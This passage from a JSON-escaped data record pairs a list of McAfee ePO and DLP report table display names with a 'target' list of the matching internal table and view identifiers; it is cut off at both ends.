Recipients\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Servers\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Data Inventory\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Destination User Information\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"DLP User Session Rules\\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Source Application Information\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents \\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents \\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current Email Storage Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Destination User Groups\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Network discovery action information \\\",\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Policies\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents History\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Current File System Discovery Scan\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"File Classification\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Printer\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"User Information\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest File System Discovery Classifications\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"DLP Computer Properties\\\",\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"File Paths\\\",\\r\\n\\t\\t\\t\\\"File Reputation\\\",\\r\\n\\t\\t\\t\\\"tieserver.fileParent.tableInfo.name\\\",\\r\\n\\t\\t\\t\\\"File Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"New Certificate References\\\",\\r\\n\\t\\t\\t\\\"Certificate Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"Certificates\\\",\\r\\n\\t\\t\\t\\\"Certificates\\\",\\r\\n\\t\\t\\t\\\"MWG Reputations\\\",\\r\\n\\t\\t\\t\\\"Certificate Reputation\\\",\\r\\n\\t\\t\\t\\\"Certificate GTI Reputation\\\",\\r\\n\\t\\t\\t\\\"Files\\\",\\r\\n\\t\\t\\t\\\"File Reputation\\\",\\r\\n\\t\\t\\t\\\"New Certificates on Systems\\\",\\r\\n\\t\\t\\t\\\"Files\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_enterprise_parent.table.name\\\",\\r\\n\\t\\t\\t\\\"New Files on Systems\\\",\\r\\n\\t\\t\\t\\\"GTI Reputations\\\",\\r\\n\\t\\t\\t\\\"GTI Reputations\\\",\\r\\n\\t\\t\\t\\\"Certificate Enterprise Reputation\\\",\\r\\n\\t\\t\\t\\\"File Reputation\\\",\\r\\n\\t\\t\\t\\\"certificate_rep.table.name\\\",\\r\\n\\t\\t\\t\\\"File Names\\\",\\r\\n\\t\\t\\t\\\"Enterprise Reputations\\\",\\r\\n\\t\\t\\t\\\"Enterprise Reputations\\\",\\r\\n\\t\\t\\t\\\"Reputations\\\",\\r\\n\\t\\t\\t\\\"CTD Reputations\\\",\\r\\n\\t\\t\\t\\\"Cleanup Trending Summary\\\",\\r\\n\\t\\t\\t\\\"ATD Reputations\\\",\\r\\n\\t\\t\\t\\\"New File References\\\"\\r\\n\\t\\t]\"",
    "target": "\"[\\r\\n\\t\\t\\t\\\"workloaddetailVcenter\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_Archive\\\",\\r\\n\\t\\t\\t\\\"groupinfo\\\",\\r\\n\\t\\t\\t\\\"epoproductproperties\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MARSERVER\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentResolutions\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryScansRegDocView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_RegisterDocumentsClassification\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesTIE\\\",\\r\\n\\t\\t\\t\\\"vpcflowLog\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid\\\",\\r\\n\\t\\t\\t\\\"EPOEventFilterDesc\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalLabelInfoView_Archive\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogTask\\\",\\r\\n\\t\\t\\t\\\"UDLP_EP_Scans\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueries_Archive\\\",\\r\\n\\t\\t\\t\\\"EPORollUp_AssignedPolicyView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation_Rollup\\\",\\r\\n\\t\\t\\t\\\"MDCC_EP_SEC_REPORT_VIEW\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentStatuses_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseExport\\\",\\r\\n\\t\\t\\t\\\"issueDetailGroup1\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional\\\",\\r\\n\\t\\t\\t\\\"EndpointInstallationStatus_View\\\",\\r\\n\\t\\t\\t\\\"EPOTagUsage\\\",\\r\\n\\t\\t\\t\\\"mgi1\\\",\\r\\n\\t\\t\\t\\\"EPOBranchNode\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Archive\\\",\\r\\n\\t\\t\\t\\\"DXLClientEpoProps\\\",\\r\\n\\t\\t\\t\\\"MarProperties\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidencesQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation_Archive\\\",\\r\\n\\t\\t\\t\\\"epoTagAssignment\\\",\\r\\n\\t\\t\\t\\\"EPOComputerProperties\\\",\\r\\n\\t\\t\\t\\\"sasvmsetting\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesTELEMETRY\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Rollup\\\",\\r\\n\\t\\t\\t\\\"threateventdetails\\\",\\r\\n\\t\\t\\t\\\"DXLProdPropsView_DXLCLIENT\\\",\\r\\n\\t\\t\\t\\\"threatinstance\\\",\\r\\n\\t\\t\\t\\\"MDCC_VPCFLOW_REPORT_VIEW\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryServersView\\\",\\r\\n\\t\\t\\t\\\"UDLP_ProductDistributionView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode\\\",\\r\\n\\t\\t\\t\\\"UDLP_AutoRegisterDocuments\\\",\\r\\n\\t\\t\\t\\\"kubelabelinfo\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLBROKER\\\",\\r\\n\\t\\t\\t\\\"ATP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_awsSquid\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesAllView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences_Rollup\\\",\\r\\n\\t\\t\\t\\\"vminfo\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesAZURE_META\\\",\\r\\n\\t\\t\\t\\\"EPOTagRestrictionsCS\\\",\\r\\n\\t\\t\\t\\\"mdccvminfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLCLIENTJ\\\",\\r\\n\\t\\t\\t\\\"ePOLeafNode\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MVEDR\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary_Archive\\\",\\r\\n\\t\\t\\t\\\"FW_NamedNetwork\\\",\\r\\n\\t\\t\\t\\\"UDLP_RulesPerUser\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentStatuses\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences_Capture\\\",\\r\\n\\t\\t\\t\\\"ASSESSMENT_DASHBOARD_VIEW\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesPCR\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident_CaseMgmt\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Capture\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_CAPTURE\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentApplications\\\",\\r\\n\\t\\t\\t\\\"EPOBrokenInherintanceView\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseStatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentClassifications_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"vminfoVendortag\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_openstackPrivateCloudSquid\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MATD\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummaryForMaReport\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident_Archive\\\",\\r\\n\\t\\t\\t\\\"mdccaccountinfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_ENDPOINTSECURITYPLATFORM\\\",\\r\\n\\t\\t\\t\\\"JTIClientRulesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud_Archive\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMAR\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied_Archive\\\",\\r\\n\\t\\t\\t\\\"MARRemediationEvent\\\",\\r\\n\\t\\t\\t\\\"ESPRollup_GS_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_TIECLIENTMETA\\\",\\r\\n\\t\\t\\t\\\"workloadalerts\\\",\\r\\n\\t\\t\\t\\\"vmInfokubernetes\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesWEBCONTROL\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare_Archive\\\",\\r\\n\\t\\t\\t\\\"EPORepositoryStatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_RegisterDocuments\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidencesQueries_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationBoxView\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_FIREWALL\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryScansView\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesFIREWALL\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"MDCC_EP_SCAN_REPORT\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPORollup_TaskAppliedTasks\\\",\\r\\n\\t\\t\\t\\\"GS_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"MDCC_VW_SECURITY_INCIDENT\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedTargetsView\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMCA\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals_Archive\\\",\\r\\n\\t\\t\\t\\\"WP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseManagement\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserPropertiesView\\\",\\r\\n\\t\\t\\t\\\"EPOMasterCatalog\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_vcenterSquid\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_DISCOVERY_OCR\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentScan\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_VISUALIZATION\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MCPAGENT\\\",\\r\\n\\t\\t\\t\\\"EPOAgentHandlers\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventPolicyInfo_Rollup\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"OrionRegisteredServers\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogSubtask\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryInventoryFactsView\\\",\\r\\n\\t\\t\\t\\\"FW_ClientRuleExecutableView\\\",\\r\\n\\t\\t\\t\\\"workloaddetail_1\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseToLabels\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences\\\",\\r\\n\\t\\t\\t\\\"MDCC_ACCOUNT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PROPERTY\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventComputers_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesTHREATPREVENTION\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage_Archive\\\",\\r\\n\\t\\t\\t\\\"issueGroup\\\",\\r\\n\\t\\t\\t\\\"StatisticsTable_EPOAgent3000\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesTIECLIENTMETA\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_ComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"EPOEvents_RelatedSourcesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryClassificationFactsView\\\",\\r\\n\\t\\t\\t\\\"EPOProductPropertyProducts\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_ExportEventDetails\\\",\\r\\n\\t\\t\\t\\\"TIEServerCustomProps\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesENDPOINTSECURITYPLATFORM\\\",\\r\\n\\t\\t\\t\\\"workloadDetailAwsAzure\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfo\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_CAPTURE\\\",\\r\\n\\t\\t\\t\\\"EPOTag\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"EPOTaskBrokenInheritAssignments\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLCLIENTJ1\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEventStatus_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMCPAGENT\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputersToPoliciesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_CaseMgmt\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_INFO\\\",\\r\\n\\t\\t\\t\\\"EPOExtendedComputerProperties\\\",\\r\\n\\t\\t\\t\\\"FW_Rule_LocalNetwork\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesView\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_Computers\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_TELEMETRY\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode_Archive\\\",\\r\\n\\t\\t\\t\\\"TIEServerIOCState\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_Rollup\\\",\\r\\n\\t\\t\\t\\\"MarCustomEvent\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEventResolution_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey\\\",\\r\\n\\t\\t\\t\\\"tagIssueCount\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_PCR\\\",\\r\\n\\t\\t\\t\\\"sassettingstatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaptureSearchView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_Archive\\\",\\r\\n\\t\\t\\t\\\"groupproperty\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventComputers\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"ClientUILockOutStatusTable_view\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLCLIENTJ1\\\",\\r\\n\\t\\t\\t\\\"mginf\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoSharePointView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentApplications_Rollup\\\",\\r\\n\\t\\t\\t\\\"FW_Rule_RemoteNetwork\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOSysTreePathsView\\\",\\r\\n\\t\\t\\t\\\"OrionIssues\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLCLIENTJ\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_TIE\\\",\\r\\n\\t\\t\\t\\\"vmproperty\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_MONITOR\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoDatabaseView\\\",\\r\\n\\t\\t\\t\\\"ESPRollup_EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"epocomputerprops\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseResolution\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoBoxView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventPolicyInfo\\\",\\r\\n\\t\\t\\t\\\"EPOSystemProductVersionInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel\\\",\\r\\n\\t\\t\\t\\\"epoTagVendortag\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MARPLAT\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare_Rollup\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMARPLAT\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_AZURE_META\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass\\\",\\r\\n\\t\\t\\t\\\"epoTagAssignmentVendortag\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaptureAppliances\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers_Destination\\\",\\r\\n\\t\\t\\t\\\"EPOTagGroup\\\",\\r\\n\\t\\t\\t\\\"UDLP_Incidents_CaseMgmt\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_DISCOVERY_OCR\\\",\\r\\n\\t\\t\\t\\\"EPOServerKeys\\\",\\r\\n\